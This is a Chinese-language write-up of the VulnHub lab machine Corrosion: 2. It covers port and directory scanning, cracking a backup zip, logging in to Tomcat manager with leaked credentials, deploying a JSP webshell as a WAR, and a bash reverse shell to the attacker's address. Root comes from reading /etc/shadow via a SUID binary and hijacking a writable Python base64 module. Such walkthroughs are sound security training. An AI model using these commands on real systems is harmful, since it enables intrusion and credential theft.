[vulnhub] Corrosion: 2

https://www.vulnhub.com/entry/corrosion-2,745/

提示:枚举才是神

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是6kali10

    nmap -sP 192.168.56.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 21:50 CST
    Nmap scan report for 192.168.56.1
    Host is up (0.00048s latency).
    MAC Address: 0A:00:27:00:00:14 (Unknown)
    Nmap scan report for 192.168.56.2
    Host is up (0.00040s latency).
    MAC Address: 08:00:27:E5:3B:06 (Oracle VirtualBox virtual NIC)
    Nmap scan report for 192.168.56.6
    Host is up (0.00055s latency).
    MAC Address: 08:00:27:0A:3A:6B (Oracle VirtualBox virtual NIC)
    Nmap scan report for 192.168.56.10
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.56.6  
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 21:51 CST
    Nmap scan report for 192.168.56.6
    Host is up (0.00032s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    8080/tcp open  http-proxy
    
  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p 80,22,8080 192.168.56.6  
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 21:52 CST
    Nmap scan report for 192.168.56.6
    Host is up (0.00052s latency).PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    8080/tcp open  http    Apache Tomcat 9.0.53
    MAC Address: 08:00:27:0A:3A:6B (Oracle VirtualBox virtual NIC)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 5.X
    OS CPE: cpe:/o:linux:linux_kernel:5
    OS details: Linux 5.0 - 5.5
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,22,8080 192.168.56.6  
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-11 21:52 CST
    Nmap scan report for 192.168.56.6
    Host is up (0.00053s latency).PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    8080/tcp open  http-proxy
    | http-enum: 
    |   /backup.zip: Possible backup
    |   /examples/: Sample scripts
    |   /manager/html/upload: Apache Tomcat (401 )
    |   /manager/html: Apache Tomcat (401 )
    |_  /docs/: Potentially interesting folder
    MAC Address: 08:00:27:0A:3A:6B (Oracle VirtualBox virtual NIC)
    

web渗透

80 端口

  1. 访问主页是Apache默认页面

  2. 扫描目录

    gobuster dir -u http://192.168.56.6 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,zip
    ,txt
    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.56.6
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Extensions:              php,html,zip,txt
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /.html                (Status: 403) [Size: 277]
    /index.html           (Status: 200) [Size: 10918]
    /.html                (Status: 403) [Size: 277]
    /server-status        (Status: 403) [Size: 277]
    Progress: 1102800 / 1102805 (100.00%)
    ===============================================================
    Finished
    ===============================================================
    

    没扫描出什么,先放着

8080 端口

  1. 访问时Tomcat的默认页面

    在这里插入图片描述

  2. 二话不说,扫目录

    gobuster dir -u http://192.168.56.6:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,zip,txt                                                                 22:05:48 [45/161]
    ===============================================================                                                                                                                                                   
    Gobuster v3.6                                                                                                                                                                                                     
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)                                                                                                                                                     
    ===============================================================                                                                                                                                                   
    [+] Url:                     http://192.168.56.6:8080                                                                                                                                                             
    [+] Method:                  GET                                                                                                                                                                                  
    [+] Threads:                 10                                                                                                                                                                                   
    [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                                                                                                         
    [+] Negative Status codes:   404                                                                                                                                                                                  
    [+] User Agent:              gobuster/3.6                                                                                                                                                                         
    [+] Extensions:              php,html,zip,txt                                                                                                                                                                     
    [+] Timeout:                 10s                                                                                                                                                                                  
    ===============================================================                                                                                                                                                   
    Starting gobuster in directory enumeration mode                                                                                                                                                                   
    ===============================================================                                                                                                                                                   
    /docs                 (Status: 302) [Size: 0] [--> /docs/]                                                                                                                                                        
    /examples             (Status: 302) [Size: 0] [--> /examples/]                                                                                                                                                    
    /backup.zip           (Status: 200) [Size: 33723]                                                                                                                                                                 
    /readme.txt           (Status: 200) [Size: 153]                                                                                                                                                                   
    /manager              (Status: 302) [Size: 0] [--> /manager/] 
    /RELEASE-NOTES.txt    (Status: 200) [Size: 6898]
    Progress: 1102800 / 1102805 (100.00%)                                                                    
    ===============================================================                                                                                                                                                   
    Finished                                            
    =============================================================== 
    

    我已经把404状态码的过滤了

    • /docstomcat的文档

    • /examples/tomcat例子

    • /backup.zip 压缩包内容应该是备份的,解压需要密码

    • readme.txt 我以为是官方文档

      Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
      Also remember to use that password I gave you.
      嘿,兰迪!我是你的系统管理员。我在服务器上给你留了一个文件,我相信没人能找到它。
      另外记得使用我给你的密码
      
    • /manager 需要提供账号密码

  3. 暂时没什么线索,想尝试爆破出压缩包的密码

    • 使用fcrackzip

      crackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zipPASSWORD FOUND!!!!: pw == @administrator_hi5
      

      解出密码 @administrator_hi5

    • 解压压缩包,输出破解出的密码

      unzip backup.zip -d backup  
      Archive:  backup.zip
      [backup.zip] catalina.policy password: inflating: backup/catalina.policy  inflating: backup/context.xml      inflating: backup/catalina.properties  inflating: backup/jaspic-providers.xml  inflating: backup/jaspic-providers.xsd  inflating: backup/logging.properties  inflating: backup/server.xml       inflating: backup/tomcat-users.xml  inflating: backup/tomcat-users.xsd  inflating: backup/web.xml
      
  4. 解压后发现存在tomcat-users.xml以及tomcat-users.xsd ,配置tomcat用户及其角色,通常用于管理后台的访问权限

    <role rolename="manager-gui"/>
    <user username="manager" password="melehifokivai" roles="manager-gui"/><role rolename="admin-gui"/>
    <user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
    

    的到密码melehifokivai ,两个用户名adminmanager ,均尝试了ssh登录无果

  5. 访问/manager 提交得到的账号密码,成功进入使用了adminmelehifokivai

    在这里插入图片描述

后台利用

  1. 进入了tomcat的后台,涉及到tomcat后台的利用

    https://blog.csdn.net/weixin_41924764/article/details/108196725

    https://blog.csdn.net/qq_43615820/article/details/116357744 这里使用的是JSP的一句话木马

  2. 复制恶意代码存为文件2131.jsp ,并使用jar制作war

    jar cvf 2131.war 2131.jsp
    
  3. 然后上传war

    在这里插入图片描述

  4. 上传之后使用蚁🗡连接,测试成功

    在这里插入图片描述

  5. 使用蚁🗡虚拟终端进行反弹shell ,同时kali开启监听

    (tomcat:/bin/sh: ) $ bash -c 'bash -i >& /dev/tcp/192.168.56.10/1234 0>&1'
    
    nc -lvp 1234                             
    listening on [any] 1234 ...
    192.168.56.6: inverse host lookup failed: Unknown host
    connect to [192.168.56.10] from (UNKNOWN) [192.168.56.6] 58882
    bash: cannot set terminal process group (1277): Inappropriate ioctl for device
    bash: no job control in this shell
    tomcat@corrosion:/var/spool/cron$ 
    

    获得shell!!!

提权 - tomcat用户

  1. 查看权限

    tomcat@corrosion:/var/spool/cron$ whoami
    tomcat
    tomcat@corrosion:/var/spool/cron$ id
    uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
    tomcat@corrosion:/var/spool/cron$ uname -a
    Linux corrosion 5.11.0-34-generic #36~20.04.1-Ubuntu SMP Fri Aug 27 08:06:32 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    
  2. 寻找敏感目录

    • 家目录下存在jaye文件夹和randy文件夹,其中jaye没有访问权限,只能看randy的文件夹
      • note.txt

        tomcat@corrosion:/home/randy$ cat note.txt 
        Hey randy this is your system administrator, hope your having a great day! I just wanted to let you know
        that I changed your permissions for your home directory. You won't be able to remove or add files for now.I will change these permissions later on.See you next Monday randy!
        嘿 randy 我是你的系统管理员,希望你今天过得愉快!我只是想让你知道
        我更改了你的主目录的权限。你现在无法删除或添加文件。我稍后会更改这些权限。下周一见 randy!
        
      • randombase64.py

        tomcat@corrosion:/home/randy$ cat randombase64.py 
        import base64
        message = input("Enter your string: ")
        message_bytes = message.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')
        print(base64_message)
        tomcat@corrosion:/home/randy$ 
        
      • user.txt

        tomcat@corrosion:/home/randy$ cat user.txt
        ca73a018ae6908a7d0ea5d1c269ba4b6
        
  3. 操作了一番还是没找到提权的地方,记得之前给了一串密码melehifokivai ,只尝试了randy的用户还有jaye账号的没尝试

    尝试在jaye使用ssh登录

    ssh jaye@192.168.56.6
    jaye@192.168.56.6's password: 
    Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage19 updates can be applied immediately.
    To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    $ 

    登陆成功

提权 - jaye用户

  1. 寻找敏感文件

    • 在家目录下存在Files文件夹权限是root的,里边存在个可执行文件look ,是root权限的,并且我们拥有执行权限,这样我们就可以使用look命令来读取shadow文件的内容了

      ---s--s--x  1 root root 14728 Sep 17  2021 look
      
  2. 使用look命令读取shadow文件,读取root用户以及randy用户

    ./look -f "root" /etc/shadow
    root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
    ./look -f "randy" /etc/shadow
    randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
    

    保存为pass文件放到john进行爆破,破解了五个多小时,仅破解了randy用户的密码

    07051986randy (randy)
    
  3. 使用密码登录ssh

    ssh randy@192.168.56.6
    randy@192.168.56.6's password: 
    Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage19 updates can be applied immediately.
    To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    

提权 - randy用户

  1. 查看权限

    randy@corrosion:~$ sudo -l
    [sudo] password for randy: 
    Matching Defaults entries for randy on corrosion:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser randy may run the following commands on corrosion:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
    
  2. 查看/home/randy/randombase64.py 是否拥有修改权限

    -rwxr-xr-x  1 root  root   210 Sep 20  2021 randombase64.py
    

    不能直接写入命令

  3. 我们知道它使用了base64模块,我们直接去修改base64模块

    randy@corrosion:~$ ls -al /usr/lib/python3.8/base64.py 
    -rwxrwxrwx 1 root root 20386 Sep 20  2021 /usr/lib/python3.8/base64.py
    

    刚好也拥有权限,修改文件

    # nano /usr/lib/python3.8/base64.py
    import os
    .... 省略
    def b64encode(s, altchars=None):os.system("/bin/bash")
    

    需要写在b64encode 函数里边是因为它文件(randombase64.py)里面调用了该函数

  4. 执行文件randombase64.py

    randy@corrosion:~$ sudo /usr/bin/python3.8 /home/randy/randombase64.py
    Enter your string: 1
    root@corrosion:/home/randy# 
    

    获得root用户!!!

  5. 读取flag文件

    root@corrosion:~# cat root.txt
    2fdbf8d4f894292361d6c72c8e833a4b
    

总结

学到tomcat后台提权方法,其实不止上传war方法,也可以直接使用MSF,不过使用方法是一样的,但是方便

以及提权,我们可以直接使用look来读取root的flag文件的,并且在laye用户也可以使用**polkit-agent-helper-1** 来提权的,不过拿到root权限不是更好吗

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/12360.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

前端请求后端php接口跨域 cors问题

只需要后端在网站的入口文件 一般都是 index.php 加上 这几行代码就可以了 具体的参数可以根据需要去修改 header("Access-Control-Allow-Origin: *"); header(Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS); header(Access-Control-Allow-Heade…

【星闪EBM-H63开发板】AT固件的配置与测试

引言 前面的博客已经介绍了【星闪EBM-H63开发板】小熊派固件中心的使用_bearpi-bm h63固件烧录工具-CSDN博客和【星闪EBM-H63开发板】固件的烧录-CSDN博客&#xff0c;今天来测试一下另一种固件&#xff0c;也就是AT固件。有关AT固件的介绍参见&#xff1a;【星闪EBM-H63开发板…

Linux基础(十四)——BASH

BASH 1.BASH定义2.shell的种类3.bash的功能3.1 命令记录功能3.2 命令补全功能3.3 命令别名设置3.4 工作控制、 前景背景控制3.5 程序化脚本&#xff1a; &#xff08; shell scripts&#xff09;3.6 万用字符 4.bash的内置命令5.shell的变量功能5.1 变量的取用5.2 新建变量5.3 …

【前端学习笔记】JavaScript学习一【变量与数据类型】

一、变量 变量是计算机中用来存储数据的“容器”&#xff0c;通俗的理解变量就是使用【某个符号】来代表【某个具体的数值】&#xff08;数据&#xff09; 声明&#xff1a;声明(定义)变量有两部分构成&#xff1a;关键字 变量名 JavaScript 使用关键字 let 和 var 来声明&am…

使用Git工具在GitHub的仓库中上传文件夹(超详细)

如何使用Git工具在GitHub的仓库中上传文件夹&#xff1f; 如果觉得博主写的还可以&#xff0c;点赞收藏关注噢~ 第一步&#xff1a;拥有一个本地的仓库 可以fork别人的仓库或者自己新创建 fork别人的仓库 或者自己创建一个仓库 按照要求填写完成后&#xff0c;点击按钮创建…

Linux kernel 堆溢出利用方法(二)

前言 本文我们通过我们的老朋友heap_bof来讲解Linux kernel中off-by-null的利用手法。在通过讲解另一道相对来说比较困难的kernel off-by-null docker escape来深入了解这种漏洞的利用手法。&#xff08;没了解过docker逃逸的朋友也可以看懂&#xff0c;毕竟有了root权限后&a…

福昕阅读器高级版解决文件上传IEEE PDF eXpress字体未嵌入

文件上传IEEE PDF eXpress字体未嵌入问题 Errors: Font Arial-BoldMT, Arial-ItalicMT, ArialMT is not embedded (93x on pages 2-3,5) 因为没安装adobe&#xff0c;尝试使用福昕阅读器高级版解决&#xff08;学校统一买的&#xff0c;不知道普通版行不行&#xff09; 找到潜…

人工智能在智能家居的应用

AI 在智能家居场景中&#xff0c;一方面将进一步推动家居生活产品的智能化&#xff0c;包 括照明系统、音箱系统、能源管理系统、安防系统等&#xff0c;实现家居产品从感知到认知再到决策的 发展&#xff1b;另一方面在于智能家居系统的建立&#xff0c;搭载人工智能的多款产品…

如何管理好自己的LabVIEW项目

在LabVIEW项目开发中&#xff0c;项目管理对于提高开发效率、确保项目质量、减少错误和维护成本至关重要。以下从项目规划、代码管理、测试与调试、版本控制、团队协作等方面&#xff0c;分享LabVIEW项目管理的体会。 ​ 1. 项目规划与需求分析 关键步骤&#xff1a; 需求分析…

51c自动驾驶~合集10

我自己的原文哦~ https://blog.51cto.com/whaosoft/11638131 #端到端任务 说起端到端&#xff0c;每个从业者可能都觉得会是下一代自动驾驶量产方案绕不开的点&#xff01;特斯拉率先吹响了方案更新的号角&#xff0c;无论是完全端到端&#xff0c;还是专注于planner的模型&a…

vs2022搭建opencv开发环境

1 下载OpenCV库 https://opencv.org/ 下载对应版本然后进行安装 将bin目录添加到系统环境变量opencv\build\x64\vc16\bin 复制该路径 打开高级设置添加环境变量 vs2022新建一个空项目 修改属性添加头文件路径和库路径 修改链接器&#xff0c;将OpenCV中lib库里的o…

蓝牙音响音频功放:【矽源特HAA9809 AB+D类自动切换】

目录 1&#xff1a;HAA9809特性 2&#xff1a;典型应用电路 3&#xff1a;CTRL管脚控制信息 4&#xff1a;一线脉冲控制方式 5&#xff1a;输入电阻&#xff0c;调节放大增益 6&#xff1a;输入电容&#xff0c;调节频响 7&#xff1a;总结 矽源特ChipSourceTek-HAA9809…

大语言模型安全,到底是什么的安全

什么是AI安全 自ChatGPT问世以来&#xff0c;市场上涌现出了众多大型语言模型和多样化的AI应用。这些应用和模型在为我们的生活带来便利的同时&#xff0c;也不可避免地面临着安全挑战。AI安全&#xff0c;即人工智能安全&#xff0c;涉及在人工智能系统的开发、部署和使用全过…

云岚到家 秒杀抢购

目录 秒杀抢购业务特点 常用技术方案 抢券 抢券界面 进行抢券 我的优惠券列表 活动查询 系统设计 活动查询分析 活动查询界面显示了哪些数据&#xff1f; 面向高并发如何提高活动查询性能&#xff1f; 如何保证缓存一致性&#xff1f; 数据流 Redis数据结构设计 如…

餐饮点餐系统(2)

今天我们继续完成我们的项目&#xff0c;本次的目标是为每一个分支选项&#xff0c;创建菜单。 分析&#xff1a;1.首先我们要为每一个分支选项创建一个函数 2.其次是调用我们创建的函数 3.最后创建的自定义函数中会用到&#xff0c;while语句&#xff0c;switch语句&#xff…

某军工变压器企业:通过集团级工业IOT平台,实现数字化转型

概述 近年来&#xff0c;随着全球电力需求的增长和智能电网的推进&#xff0c;变压器市场规模持续扩大。2023年&#xff0c;全球配电变压器市场规模达到143.21亿美元&#xff0c;同比增长8.12%。中国配电变压器市场规模在2023年达到194.35亿元&#xff0c;同比增长14.53%‌。此…

caozha-CEPCS(新冠肺炎疫情防控系统)

caozha-CEPCS&#xff0c;是一个基于PHP开发的新冠肺炎疫情防控系统&#xff0c;CEPCS&#xff08;全称&#xff1a;COVID-19 Epidemic Prevention and Control System&#xff09;&#xff0c;可以应用于单位、企业、学校、工业园区、村落等等。小小系统&#xff0c;希望能为大…

第8章利用CSS制作导航菜单

8.1 水平顶部导航栏 <!DOCTYPE html> <html><head><meta charset"utf-8" /><title></title></head><body><center><h3>简单水平菜单导航栏</h3></center><hr /><nav><ul&g…

《青牛科技GC6150:摇头机驱动芯片的卓越替代品,超越 TMI8150》

在终端工程师们精心打造的科技世界里&#xff0c;摇头机的性能优化一直是关注焦点。今天&#xff0c;我们要向各位终端工程师介绍一款具有革命性的驱动芯片 —— 芯麦 GC6150&#xff0c;它宛如一颗耀眼的明星&#xff0c;在摇头机驱动领域绽放光芒&#xff0c;并且能够完美替代…

C++转义序列

\b \b是一个退格符&#xff08;backspace character&#xff09;&#xff0c;它的作用是将光标向左移动一个位置&#xff0c;但并不会删除光标位置上的字符。这个行为在某些情况下可能会导致视觉上的字符“消失”&#xff0c;但实际上这些字符仍然存在于输出缓冲区中&#xf…